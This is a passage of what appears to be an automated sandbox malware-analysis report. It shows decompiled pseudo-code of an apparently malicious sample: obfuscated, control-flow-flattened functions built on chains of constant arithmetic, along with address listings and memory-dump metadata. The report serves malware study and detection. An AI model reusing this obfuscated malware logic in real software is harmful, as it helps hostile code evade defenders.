				_t977 = 0x51daea9;
				goto L37;
			}
			__eflags = _t977 - 0x9a35046;
			if(_t977 == 0x9a35046) {
				E00332B62(_v280, _t986, _v176, _v288);
				goto L41;
			}
			__eflags = _t977 - 0xb70b8d2;
			if(_t977 == 0xb70b8d2) {
				__eflags = E0034A2E8(_t976, _a4);
				_t977 = 0x81a6b17;
				_t829 = 1;
				_t862 =  !=  ? _t829 : _t862;
				goto L11;
			}
			__eflags = _t977 - 0xba06d79;
			if(__eflags == 0) {
				__eflags = E003509B5(_t976, _v120, __eflags) - _v36;
				_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
				goto L11;
			}
			__eflags = _t977 - 0xbee37f5;
			if(_t977 != 0xbee37f5) {
				goto L38;
			}
			_t832 = _v8;
			_t888 =  *_t832;
			__eflags = _t888;
			if(_t888 == 0) {
				_t833 = 0;
				__eflags = 0;
			} else {
				_t833 = _t832[1];
			}
			E00332AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
			_t988 =  &(_t988[7]);
			asm("sbb esi, esi");
			_t977 = (_t977 & 0x03860262) + 0x81a6b17;
			goto L11;
		}
	}
}
                                                                                                                    0x0034e8d5
                                                                                                                    0x0034e8de
                                                                                                                    0x0034e8e9
                                                                                                                    0x0034e8f4
                                                                                                                    0x0034e8ff
                                                                                                                    0x0034e90a
                                                                                                                    0x0034e915
                                                                                                                    0x0034e920
                                                                                                                    0x0034e932
                                                                                                                    0x0034e935
                                                                                                                    0x0034e93c
                                                                                                                    0x0034e947
                                                                                                                    0x0034e952
                                                                                                                    0x0034e95d
                                                                                                                    0x0034e968
                                                                                                                    0x0034e973
                                                                                                                    0x0034e97e
                                                                                                                    0x0034e989
                                                                                                                    0x0034e99f
                                                                                                                    0x0034e9a4
                                                                                                                    0x0034e9ab
                                                                                                                    0x0034e9b6
                                                                                                                    0x0034e9ca
                                                                                                                    0x0034e9cf
                                                                                                                    0x0034e9d6
                                                                                                                    0x0034e9de
                                                                                                                    0x0034e9e9
                                                                                                                    0x0034e9f7
                                                                                                                    0x0034e9fc
                                                                                                                    0x0034ea00
                                                                                                                    0x0034ea05
                                                                                                                    0x0034ea0a
                                                                                                                    0x0034ea12
                                                                                                                    0x0034ea1d
                                                                                                                    0x0034ea28
                                                                                                                    0x0034ea33
                                                                                                                    0x0034ea48
                                                                                                                    0x0034ea49
                                                                                                                    0x0034ea50
                                                                                                                    0x0034ea5b
                                                                                                                    0x0034ea63
                                                                                                                    0x0034ea6b
                                                                                                                    0x0034ea73
                                                                                                                    0x0034ea7b
                                                                                                                    0x0034ea83
                                                                                                                    0x0034ea90
                                                                                                                    0x0034ea94
                                                                                                                    0x0034ea9c
                                                                                                                    0x0034eaa4
                                                                                                                    0x0034eaac
                                                                                                                    0x0034eabf
                                                                                                                    0x0034eac6
                                                                                                                    0x0034eace
                                                                                                                    0x0034ead9
                                                                                                                    0x0034eae4
                                                                                                                    0x0034eaef
                                                                                                                    0x0034eaf7
                                                                                                                    0x0034eb02
                                                                                                                    0x0034eb0d
                                                                                                                    0x0034eb15
                                                                                                                    0x0034eb1d
                                                                                                                    0x0034eb28
                                                                                                                    0x0034eb30
                                                                                                                    0x0034eb3d
                                                                                                                    0x0034eb41
                                                                                                                    0x0034eb49
                                                                                                                    0x0034eb51
                                                                                                                    0x0034eb67
                                                                                                                    0x0034eb6e
                                                                                                                    0x0034eb79
                                                                                                                    0x0034eb84
                                                                                                                    0x0034eb8c
                                                                                                                    0x0034eb97
                                                                                                                    0x0034ebab
                                                                                                                    0x0034ebb2
                                                                                                                    0x0034ebbd
                                                                                                                    0x0034ebc8
                                                                                                                    0x0034ebd2
                                                                                                                    0x0034ebda
                                                                                                                    0x0034ebe5
                                                                                                                    0x0034ebf4
                                                                                                                    0x0034ebf5
                                                                                                                    0x0034ebf9
                                                                                                                    0x0034ebfe
                                                                                                                    0x0034ec06
                                                                                                                    0x0034ec0e
                                                                                                                    0x0034ec16
                                                                                                                    0x0034ec23
                                                                                                                    0x0034ec27
                                                                                                                    0x0034ec2f
                                                                                                                    0x0034ec37
                                                                                                                    0x0034ec3f
                                                                                                                    0x0034ec47
                                                                                                                    0x0034ec4f
                                                                                                                    0x0034ec54
                                                                                                                    0x0034ec5c
                                                                                                                    0x0034ec64
                                                                                                                    0x0034ec69
                                                                                                                    0x0034ec6e
                                                                                                                    0x0034ec73
                                                                                                                    0x0034ec7b
                                                                                                                    0x0034ec86
                                                                                                                    0x0034ec91
                                                                                                                    0x0034ec9c
                                                                                                                    0x0034eca4
                                                                                                                    0x0034ecb1
                                                                                                                    0x0034ecba
                                                                                                                    0x0034ecbe
                                                                                                                    0x0034ecc6
                                                                                                                    0x0034ecd1
                                                                                                                    0x0034ecdc
                                                                                                                    0x0034ece7
                                                                                                                    0x0034ecf2
                                                                                                                    0x0034ecfa
                                                                                                                    0x0034ed05
                                                                                                                    0x0034ed10
                                                                                                                    0x0034ed1d
                                                                                                                    0x0034ed21
                                                                                                                    0x0034ed29
                                                                                                                    0x0034ed2e
                                                                                                                    0x0034ed36
                                                                                                                    0x0034ed41
                                                                                                                    0x0034ed4c
                                                                                                                    0x0034ed57
                                                                                                                    0x0034ed5f
                                                                                                                    0x0034ed67
                                                                                                                    0x0034ed6f
                                                                                                                    0x0034ed77
                                                                                                                    0x0034ed7f
                                                                                                                    0x0034ed87
                                                                                                                    0x0034ed8c
                                                                                                                    0x0034ed94
                                                                                                                    0x0034ed9c
                                                                                                                    0x0034eda4
                                                                                                                    0x0034edac
                                                                                                                    0x0034edb4
                                                                                                                    0x0034edb9
                                                                                                                    0x0034edc1
                                                                                                                    0x0034edc9
                                                                                                                    0x0034edd4
                                                                                                                    0x0034eddf
                                                                                                                    0x0034edea
                                                                                                                    0x0034edfe
                                                                                                                    0x0034ee05
                                                                                                                    0x0034ee10
                                                                                                                    0x0034ee1b
                                                                                                                    0x0034ee26
                                                                                                                    0x0034ee31
                                                                                                                    0x0034ee3c
                                                                                                                    0x0034ee49
                                                                                                                    0x0034ee54
                                                                                                                    0x0034ee5f
                                                                                                                    0x0034ee67
                                                                                                                    0x0034ee75
                                                                                                                    0x0034ee7a
                                                                                                                    0x0034ee80
                                                                                                                    0x0034ee88
                                                                                                                    0x0034ee90
                                                                                                                    0x0034ee98
                                                                                                                    0x0034ee9d
                                                                                                                    0x0034eea5
                                                                                                                    0x0034eead
                                                                                                                    0x0034eeb5
                                                                                                                    0x0034eebd
                                                                                                                    0x0034eec6
                                                                                                                    0x0034eecb
                                                                                                                    0x0034eed1
                                                                                                                    0x0034eed9
                                                                                                                    0x0034eee1
                                                                                                                    0x0034eee9
                                                                                                                    0x0034eef1
                                                                                                                    0x0034eef9
                                                                                                                    0x0034ef01
                                                                                                                    0x0034ef0c
                                                                                                                    0x0034ef17
                                                                                                                    0x0034ef22
                                                                                                                    0x0034ef2d
                                                                                                                    0x0034ef38
                                                                                                                    0x0034ef43
                                                                                                                    0x0034ef55
                                                                                                                    0x0034ef5a
                                                                                                                    0x0034ef6a
                                                                                                                    0x0034ef6d
                                                                                                                    0x0034ef74
                                                                                                                    0x0034ef7f
                                                                                                                    0x0034ef8a
                                                                                                                    0x0034ef92
                                                                                                                    0x0034ef9d
                                                                                                                    0x0034efa8
                                                                                                                    0x0034efb0
                                                                                                                    0x0034efb5
                                                                                                                    0x0034efbd
                                                                                                                    0x0034efc5
                                                                                                                    0x0034efcd
                                                                                                                    0x0034efd8
                                                                                                                    0x0034efe0
                                                                                                                    0x0034efeb
                                                                                                                    0x0034eff3
                                                                                                                    0x0034effe
                                                                                                                    0x0034f006
                                                                                                                    0x0034f00e
                                                                                                                    0x0034f016
                                                                                                                    0x0034f01d
                                                                                                                    0x0034f024
                                                                                                                    0x0034f024
                                                                                                                    0x0034f024
                                                                                                                    0x0034f029
                                                                                                                    0x0034f029
                                                                                                                    0x0034f02d
                                                                                                                    0x0034f02d
                                                                                                                    0x0034f02d
                                                                                                                    0x0034f02f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034f035
                                                                                                                    0x0034f17e
                                                                                                                    0x0034f181
                                                                                                                    0x0034f183
                                                                                                                    0x0034f18f
                                                                                                                    0x0034f1a4

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                    • API String ID: 0-3417817227
                                                                                                                    • Opcode ID: 20126a28c0d24a86a8673dbc01164d58d0ba859799cd4b07e30f43f5f8be6b75
                                                                                                                    • Instruction ID: 953e43686749012f8bb9a796eb7b14ba89ffa792feb88ef893e93824747bc505
                                                                                                                    • Opcode Fuzzy Hash: 20126a28c0d24a86a8673dbc01164d58d0ba859799cd4b07e30f43f5f8be6b75
                                                                                                                    • Instruction Fuzzy Hash: C9820FB1508381CFD379CF25C54AA8BBBE1BBD4718F10892DE1D99A260D7B49949CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033BB7E(intOrPtr* __ecx) {
                                                                                                                    				char _v68;
                                                                                                                    				char _v76;
                                                                                                                    				void* _v88;
                                                                                                                    				intOrPtr _v92;
                                                                                                                    				intOrPtr _v96;
                                                                                                                    				intOrPtr* _v100;
                                                                                                                    				char _v104;
                                                                                                                    				char _v108;
                                                                                                                    				char _v112;
                                                                                                                    				char _v116;
                                                                                                                    				char _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				signed int _v272;
                                                                                                                    				signed int _v276;
                                                                                                                    				signed int _v280;
                                                                                                                    				signed int _v284;
                                                                                                                    				signed int _v288;
                                                                                                                    				signed int _v292;
                                                                                                                    				signed int _v296;
                                                                                                                    				signed int _v300;
                                                                                                                    				signed int _v304;
                                                                                                                    				signed int _v308;
                                                                                                                    				signed int _v312;
                                                                                                                    				signed int _v316;
                                                                                                                    				signed int _v320;
                                                                                                                    				signed int _v324;
                                                                                                                    				signed int _v328;
                                                                                                                    				signed int _v332;
                                                                                                                    				signed int _v336;
                                                                                                                    				signed int _v340;
                                                                                                                    				signed int _v344;
                                                                                                                    				signed int _v348;
                                                                                                                    				signed int _v352;
                                                                                                                    				signed int _v356;
                                                                                                                    				signed int _v360;
                                                                                                                    				signed int _v364;
                                                                                                                    				signed int _v368;
                                                                                                                    				signed int _v372;
                                                                                                                    				signed int _v376;
                                                                                                                    				signed int _v380;
                                                                                                                    				signed int _v384;
                                                                                                                    				void* _t690;
                                                                                                                    				void* _t691;
                                                                                                                    				void* _t697;
                                                                                                                    				void* _t700;
                                                                                                                    				void* _t701;
                                                                                                                    				void* _t704;
                                                                                                                    				void* _t710;
                                                                                                                    				char _t711;
                                                                                                                    				void* _t713;
                                                                                                                    				void* _t717;
                                                                                                                    				void* _t719;
                                                                                                                    				void* _t725;
                                                                                                                    				signed int _t732;
                                                                                                                    				signed int _t733;
                                                                                                                    				signed int _t734;
                                                                                                                    				signed int _t735;
                                                                                                                    				signed int _t736;
                                                                                                                    				signed int _t737;
                                                                                                                    				signed int _t738;
                                                                                                                    				signed int _t739;
                                                                                                                    				signed int _t740;
                                                                                                                    				signed int _t741;
                                                                                                                    				signed int _t742;
                                                                                                                    				signed int _t743;
                                                                                                                    				signed int _t744;
                                                                                                                    				signed int _t745;
                                                                                                                    				signed int _t746;
                                                                                                                    				void* _t747;
                                                                                                                    				void* _t763;
                                                                                                                    				void* _t772;
                                                                                                                    				void* _t819;
                                                                                                                    				intOrPtr _t834;
                                                                                                                    				void* _t840;
                                                                                                                    				void* _t842;
                                                                                                                    				void* _t846;
                                                                                                                    				void* _t847;
                                                                                                                    				void* _t850;
                                                                                                                    
                                                                                                                    				_v92 = 0xf68129;
                                                                                                                    				_v100 = __ecx;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t732 = 0x6b;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t846 = 0;
                                                                                                                    				_t725 = 0x7252bf3;
                                                                                                                    				asm("stosd");
                                                                                                                    				_v136 = 0x5ab987;
                                                                                                                    				_v136 = _v136 * 0x2c;
                                                                                                                    				_v136 = _v136 ^ 0x0f97e334;
                                                                                                                    				_v240 = 0x5f59f0;
                                                                                                                    				_v240 = _v240 << 5;
                                                                                                                    				_v240 = _v240 * 0x46;
                                                                                                                    				_v240 = _v240 ^ 0x4252f400;
                                                                                                                    				_v320 = 0x63212;
                                                                                                                    				_v320 = _v320 + 0xffffd9b7;
                                                                                                                    				_v320 = _v320 * 0x26;
                                                                                                                    				_v320 = _v320 + 0xffff4af1;
                                                                                                                    				_v320 = _v320 ^ 0x00e50ac7;
                                                                                                                    				_v192 = 0x354250;
                                                                                                                    				_t26 =  &_v192; // 0x354250
                                                                                                                    				_v192 =  *_t26 * 0x43;
                                                                                                                    				_v192 = _v192 ^ 0x0df05af0;
                                                                                                                    				_v308 = 0x42c709;
                                                                                                                    				_v308 = _v308 | 0x3400f9ef;
                                                                                                                    				_v308 = _v308 << 3;
                                                                                                                    				_v308 = _v308 + 0x3df1;
                                                                                                                    				_v308 = _v308 ^ 0xa2183d69;
                                                                                                                    				_v152 = 0x5369e0;
                                                                                                                    				_v152 = _v152 ^ 0xff6c3c62;
                                                                                                                    				_v152 = _v152 ^ 0xff3f5582;
                                                                                                                    				_v276 = 0x14bd80;
                                                                                                                    				_v276 = _v276 << 5;
                                                                                                                    				_v276 = _v276 ^ 0x5f90d5fe;
                                                                                                                    				_v276 = _v276 / _t732;
                                                                                                                    				_v276 = _v276 ^ 0x00de92e5;
                                                                                                                    				_v164 = 0xc6025f;
                                                                                                                    				_t733 = 0x77;
                                                                                                                    				_v164 = _v164 / _t733;
                                                                                                                    				_v164 = _v164 ^ 0x0001a9f8;
                                                                                                                    				_v196 = 0xc87c9f;
                                                                                                                    				_v196 = _v196 + 0x15df;
                                                                                                                    				_v196 = _v196 ^ 0x00c8927e;
                                                                                                                    				_v316 = 0xe66987;
                                                                                                                    				_v316 = _v316 ^ 0x1b2582a6;
                                                                                                                    				_t734 = 0x3b;
                                                                                                                    				_v316 = _v316 * 0x5b;
                                                                                                                    				_v316 = _v316 + 0x2fb1;
                                                                                                                    				_v316 = _v316 ^ 0xdea4c46c;
                                                                                                                    				_v224 = 0xfe0ac2;
                                                                                                                    				_v224 = _v224 + 0xfffff1ae;
                                                                                                                    				_v224 = _v224 ^ 0x9ea75b7a;
                                                                                                                    				_v224 = _v224 ^ 0x9e5aa70a;
                                                                                                                    				_v272 = 0x969b46;
                                                                                                                    				_v272 = _v272 / _t734;
                                                                                                                    				_t735 = 0x5e;
                                                                                                                    				_v272 = _v272 / _t735;
                                                                                                                    				_v272 = _v272 ^ 0xefd30b8f;
                                                                                                                    				_v272 = _v272 ^ 0xefd30d7c;
                                                                                                                    				_v376 = 0x150d1;
                                                                                                                    				_v376 = _v376 + 0xf180;
                                                                                                                    				_v376 = _v376 ^ 0x94f4a204;
                                                                                                                    				_v376 = _v376 + 0xffff1e44;
                                                                                                                    				_v376 = _v376 ^ 0x94f362d9;
                                                                                                                    				_v156 = 0xee57c3;
                                                                                                                    				_v156 = _v156 >> 1;
                                                                                                                    				_v156 = _v156 ^ 0x00740491;
                                                                                                                    				_v212 = 0xc602fd;
                                                                                                                    				_v212 = _v212 + 0x6a76;
                                                                                                                    				_v212 = _v212 + 0x1c99;
                                                                                                                    				_v212 = _v212 ^ 0x00ce641d;
                                                                                                                    				_v268 = 0xce4877;
                                                                                                                    				_v268 = _v268 ^ 0x1d22fca4;
                                                                                                                    				_v268 = _v268 | 0x3421cf88;
                                                                                                                    				_v268 = _v268 ^ 0x3de53c3b;
                                                                                                                    				_v124 = 0x747c03;
                                                                                                                    				_v124 = _v124 + 0xffffbae7;
                                                                                                                    				_v124 = _v124 ^ 0x007459dd;
                                                                                                                    				_v236 = 0x1c09ef;
                                                                                                                    				_t736 = 0x7d;
                                                                                                                    				_v236 = _v236 * 0x24;
                                                                                                                    				_v236 = _v236 >> 5;
                                                                                                                    				_v236 = _v236 ^ 0x00154586;
                                                                                                                    				_v248 = 0xce2f;
                                                                                                                    				_v248 = _v248 / _t736;
                                                                                                                    				_v248 = _v248 ^ 0x54fb24c5;
                                                                                                                    				_v248 = _v248 ^ 0x54f69380;
                                                                                                                    				_v368 = 0xa2f216;
                                                                                                                    				_v368 = _v368 ^ 0x77671628;
                                                                                                                    				_v368 = _v368 + 0xffffb776;
                                                                                                                    				_t737 = 0x12;
                                                                                                                    				_v368 = _v368 * 0x54;
                                                                                                                    				_v368 = _v368 ^ 0x4cdde93a;
                                                                                                                    				_v256 = 0x7ecaf1;
                                                                                                                    				_v256 = _v256 + 0xffff3fac;
                                                                                                                    				_v256 = _v256 >> 1;
                                                                                                                    				_v256 = _v256 ^ 0x003aef01;
                                                                                                                    				_v352 = 0xabf876;
                                                                                                                    				_v352 = _v352 >> 0xb;
                                                                                                                    				_v352 = _v352 + 0xffff46d6;
                                                                                                                    				_v352 = _v352 + 0x2c0c;
                                                                                                                    				_v352 = _v352 ^ 0xfff246b3;
                                                                                                                    				_v360 = 0x97ba77;
                                                                                                                    				_v360 = _v360 ^ 0x3e0377f3;
                                                                                                                    				_v360 = _v360 >> 0xd;
                                                                                                                    				_v360 = _v360 / _t737;
                                                                                                                    				_v360 = _v360 ^ 0x00060934;
                                                                                                                    				_v336 = 0x8ce7a6;
                                                                                                                    				_t738 = 0x2f;
                                                                                                                    				_v336 = _v336 / _t738;
                                                                                                                    				_v336 = _v336 + 0xffff2624;
                                                                                                                    				_v336 = _v336 | 0x278756f7;
                                                                                                                    				_v336 = _v336 ^ 0x278bbfdd;
                                                                                                                    				_v344 = 0xbf551b;
                                                                                                                    				_v344 = _v344 * 0x3a;
                                                                                                                    				_v344 = _v344 ^ 0x84c4554b;
                                                                                                                    				_v344 = _v344 << 0xf;
                                                                                                                    				_v344 = _v344 ^ 0x8ea60236;
                                                                                                                    				_v200 = 0x4381fe;
                                                                                                                    				_v200 = _v200 | 0xd1728d79;
                                                                                                                    				_v200 = _v200 ^ 0xd172d7b5;
                                                                                                                    				_v304 = 0x80f198;
                                                                                                                    				_t739 = 0x31;
                                                                                                                    				_v304 = _v304 * 0x64;
                                                                                                                    				_v304 = _v304 << 0xe;
                                                                                                                    				_v304 = _v304 + 0xffff9e99;
                                                                                                                    				_v304 = _v304 ^ 0x97d19a3f;
                                                                                                                    				_v312 = 0x373eb5;
                                                                                                                    				_v312 = _v312 / _t739;
                                                                                                                    				_v312 = _v312 >> 9;
                                                                                                                    				_v312 = _v312 ^ 0x9e5751db;
                                                                                                                    				_v312 = _v312 ^ 0x9e5d4ba0;
                                                                                                                    				_v188 = 0xb51e1e;
                                                                                                                    				_t740 = 0x6d;
                                                                                                                    				_v188 = _v188 * 0x30;
                                                                                                                    				_v188 = _v188 ^ 0x21f969de;
                                                                                                                    				_v128 = 0x6dafe5;
                                                                                                                    				_v128 = _v128 + 0xdb72;
                                                                                                                    				_v128 = _v128 ^ 0x00632f59;
                                                                                                                    				_v348 = 0xf775fc;
                                                                                                                    				_v348 = _v348 * 0x7b;
                                                                                                                    				_v348 = _v348 | 0xe77e6c6c;
                                                                                                                    				_v348 = _v348 + 0xffff92b3;
                                                                                                                    				_v348 = _v348 ^ 0xf7fd41f8;
                                                                                                                    				_v292 = 0x49707d;
                                                                                                                    				_v292 = _v292 + 0xffffa330;
                                                                                                                    				_v292 = _v292 + 0x378d;
                                                                                                                    				_v292 = _v292 ^ 0x2a616ae7;
                                                                                                                    				_v292 = _v292 ^ 0x2a2200cf;
                                                                                                                    				_v148 = 0xe2ca7f;
                                                                                                                    				_v148 = _v148 + 0x2800;
                                                                                                                    				_v148 = _v148 ^ 0x00ec4a73;
                                                                                                                    				_v180 = 0x28ed65;
                                                                                                                    				_t276 =  &_v180; // 0x28ed65
                                                                                                                    				_v180 =  *_t276 / _t740;
                                                                                                                    				_v180 = _v180 ^ 0x0008a356;
                                                                                                                    				_v340 = 0xb04f06;
                                                                                                                    				_v340 = _v340 | 0x19ae51aa;
                                                                                                                    				_v340 = _v340 + 0xffff0ab2;
                                                                                                                    				_v340 = _v340 >> 7;
                                                                                                                    				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                    				_v252 = 0x779412;
                                                                                                                    				_t741 = 0x28;
                                                                                                                    				_v252 = _v252 / _t741;
                                                                                                                    				_v252 = _v252 | 0x065d8c29;
                                                                                                                    				_v252 = _v252 ^ 0x0653787d;
                                                                                                                    				_v140 = 0x2cf99d;
                                                                                                                    				_v140 = _v140 << 0xf;
                                                                                                                    				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                    				_v300 = 0xa5c7e2;
                                                                                                                    				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                    				_v300 = _v300 | 0xd6032566;
                                                                                                                    				_v300 = _v300 << 7;
                                                                                                                    				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                    				_v204 = 0xc71fe4;
                                                                                                                    				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                    				_v204 = _v204 ^ 0x39346367;
                                                                                                                    				_v332 = 0x26340b;
                                                                                                                    				_t742 = 0xc;
                                                                                                                    				_v332 = _v332 / _t742;
                                                                                                                    				_v332 = _v332 >> 0xc;
                                                                                                                    				_v332 = _v332 + 0x4006;
                                                                                                                    				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                    				_v244 = 0xb4bdd0;
                                                                                                                    				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                    				_t743 = 0x5c;
                                                                                                                    				_v244 = _v244 * 0x56;
                                                                                                                    				_v244 = _v244 ^ 0xe668140d;
                                                                                                                    				_v228 = 0xb7abf;
                                                                                                                    				_v228 = _v228 ^ 0x8d46dccd;
                                                                                                                    				_v228 = _v228 / _t743;
                                                                                                                    				_v228 = _v228 ^ 0x0183fb21;
                                                                                                                    				_v132 = 0x744574;
                                                                                                                    				_t744 = 0x2d;
                                                                                                                    				_v132 = _v132 * 0x27;
                                                                                                                    				_v132 = _v132 ^ 0x11b9ba9e;
                                                                                                                    				_v384 = 0x4471dc;
                                                                                                                    				_v384 = _v384 ^ 0x8273491f;
                                                                                                                    				_v384 = _v384 / _t744;
                                                                                                                    				_v384 = _v384 + 0xffffe0da;
                                                                                                                    				_v384 = _v384 ^ 0x02e26e3a;
                                                                                                                    				_v324 = 0x605f40;
                                                                                                                    				_v324 = _v324 + 0xffffce94;
                                                                                                                    				_v324 = _v324 + 0xffff95c1;
                                                                                                                    				_v324 = _v324 >> 6;
                                                                                                                    				_v324 = _v324 ^ 0x0001f278;
                                                                                                                    				_v380 = 0xfa4dc1;
                                                                                                                    				_t745 = 0x17;
                                                                                                                    				_v380 = _v380 * 0x71;
                                                                                                                    				_v380 = _v380 ^ 0x12ce666f;
                                                                                                                    				_v380 = _v380 | 0xc76ff931;
                                                                                                                    				_v380 = _v380 ^ 0xfff34e85;
                                                                                                                    				_v172 = 0xf73d33;
                                                                                                                    				_v172 = _v172 >> 7;
                                                                                                                    				_v172 = _v172 ^ 0x0001a374;
                                                                                                                    				_v364 = 0xb38f71;
                                                                                                                    				_v364 = _v364 + 0x4143;
                                                                                                                    				_v364 = _v364 ^ 0x53c53aac;
                                                                                                                    				_v364 = _v364 / _t745;
                                                                                                                    				_v364 = _v364 ^ 0x03acc109;
                                                                                                                    				_v260 = 0xa91f99;
                                                                                                                    				_v260 = _v260 >> 0xa;
                                                                                                                    				_v260 = _v260 ^ 0xc9224c65;
                                                                                                                    				_v260 = _v260 ^ 0xc926367a;
                                                                                                                    				_v284 = 0x5ea8fe;
                                                                                                                    				_v284 = _v284 * 0x3e;
                                                                                                                    				_v284 = _v284 | 0x757fbe3f;
                                                                                                                    				_v284 = _v284 ^ 0x77fedad5;
                                                                                                                    				_v264 = 0xc1651a;
                                                                                                                    				_v264 = _v264 / _t745;
                                                                                                                    				_v264 = _v264 + 0x650c;
                                                                                                                    				_v264 = _v264 ^ 0x00066731;
                                                                                                                    				_v372 = 0xd53751;
                                                                                                                    				_v372 = _v372 >> 0x10;
                                                                                                                    				_v372 = _v372 * 0x50;
                                                                                                                    				_v372 = _v372 ^ 0xc5a53504;
                                                                                                                    				_v372 = _v372 ^ 0xc5a85656;
                                                                                                                    				_v220 = 0x28743;
                                                                                                                    				_v220 = _v220 | 0x747e4fe0;
                                                                                                                    				_v220 = _v220 >> 8;
                                                                                                                    				_v220 = _v220 ^ 0x0078aec3;
                                                                                                                    				_v356 = 0x673303;
                                                                                                                    				_v356 = _v356 + 0xffff3afb;
                                                                                                                    				_v356 = _v356 >> 2;
                                                                                                                    				_t746 = 0x76;
                                                                                                                    				_t842 = 0x6cd454e;
                                                                                                                    				_v96 = 0x100;
                                                                                                                    				_t840 = 0xcf5796f;
                                                                                                                    				_v356 = _v356 * 9;
                                                                                                                    				_v356 = _v356 ^ 0x00e12344;
                                                                                                                    				_v232 = 0xe5489f;
                                                                                                                    				_v232 = _v232 * 0x62;
                                                                                                                    				_v232 = _v232 ^ 0x422e6763;
                                                                                                                    				_v232 = _v232 ^ 0x15e3beef;
                                                                                                                    				_v144 = 0x9d1c0d;
                                                                                                                    				_v144 = _v144 | 0x5a9db401;
                                                                                                                    				_v144 = _v144 ^ 0x5a9ceaa6;
                                                                                                                    				_v328 = 0xaba5b0;
                                                                                                                    				_v328 = _v328 + 0xfc55;
                                                                                                                    				_v328 = _v328 * 0x37;
                                                                                                                    				_v328 = _v328 * 0x78;
                                                                                                                    				_v328 = _v328 ^ 0x62b938e2;
                                                                                                                    				_v168 = 0x51360e;
                                                                                                                    				_v168 = _v168 << 2;
                                                                                                                    				_v168 = _v168 ^ 0x014a45e2;
                                                                                                                    				_v176 = 0x11fbeb;
                                                                                                                    				_v176 = _v176 << 0xa;
                                                                                                                    				_v176 = _v176 ^ 0x47e89d0f;
                                                                                                                    				_v216 = 0x8fcc87;
                                                                                                                    				_v216 = _v216 / _t746;
                                                                                                                    				_v216 = _v216 ^ 0xd2cd5e41;
                                                                                                                    				_v216 = _v216 ^ 0xd2c9cc36;
                                                                                                                    				_v184 = 0x8a666a;
                                                                                                                    				_v184 = _v184 * 0x6c;
                                                                                                                    				_v184 = _v184 ^ 0x3a66624b;
                                                                                                                    				_v288 = 0x12fc4d;
                                                                                                                    				_v288 = _v288 ^ 0x84b68421;
                                                                                                                    				_v288 = _v288 * 0x77;
                                                                                                                    				_v288 = _v288 ^ 0xa87aad10;
                                                                                                                    				_v296 = 0xb3f337;
                                                                                                                    				_v296 = _v296 >> 1;
                                                                                                                    				_v296 = _v296 + 0xffffa2d0;
                                                                                                                    				_v296 = _v296 + 0xffff98aa;
                                                                                                                    				_v296 = _v296 ^ 0x0050e375;
                                                                                                                    				_v160 = 0xa98b94;
                                                                                                                    				_v160 = _v160 ^ 0x93f8baf3;
                                                                                                                    				_v160 = _v160 ^ 0x935506dc;
                                                                                                                    				_v208 = 0xd26eef;
                                                                                                                    				_v208 = _v208 + 0xffff657d;
                                                                                                                    				_v208 = _v208 << 5;
                                                                                                                    				_v208 = _v208 ^ 0x1a3ecca6;
                                                                                                                    				_v280 = 0xce1cc4;
                                                                                                                    				_v280 = _v280 << 6;
                                                                                                                    				_v280 = _v280 << 0x10;
                                                                                                                    				_v280 = _v280 | 0xb3a7eb9b;
                                                                                                                    				_v280 = _v280 ^ 0xb3a418cd;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t747 = 0xb34e23f;
                                                                                                                    					while(1) {
                                                                                                                    						L2:
                                                                                                                    						while(1) {
                                                                                                                    							L3:
                                                                                                                    							_t690 = 0xa0b11f8;
                                                                                                                    							do {
                                                                                                                    								while(1) {
                                                                                                                    									L4:
                                                                                                                    									_t850 = _t725 - _t690;
                                                                                                                    									if(_t850 > 0) {
                                                                                                                    										break;
                                                                                                                    									}
                                                                                                                    									if(_t850 == 0) {
